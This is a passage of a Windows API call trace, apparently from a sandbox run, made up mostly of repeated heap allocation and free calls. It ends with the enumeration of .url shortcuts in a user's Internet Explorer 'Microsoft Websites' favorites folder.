0x2d2ec90 [0175.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.767] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.768] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.769] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.771] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.784] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.785] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.786] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0175.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0175.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0175.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.786] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0175.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84be0 [0175.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0175.787] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0175.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0175.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0175.787] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0175.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0175.787] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0175.787] PathFindFileNameW (pszPath="") returned="" [0175.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b730 [0175.788] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0175.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0175.791] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.791] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee50dc0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0175.791] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0175.791] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee55be0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0175.791] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0175.791] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0175.791] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft 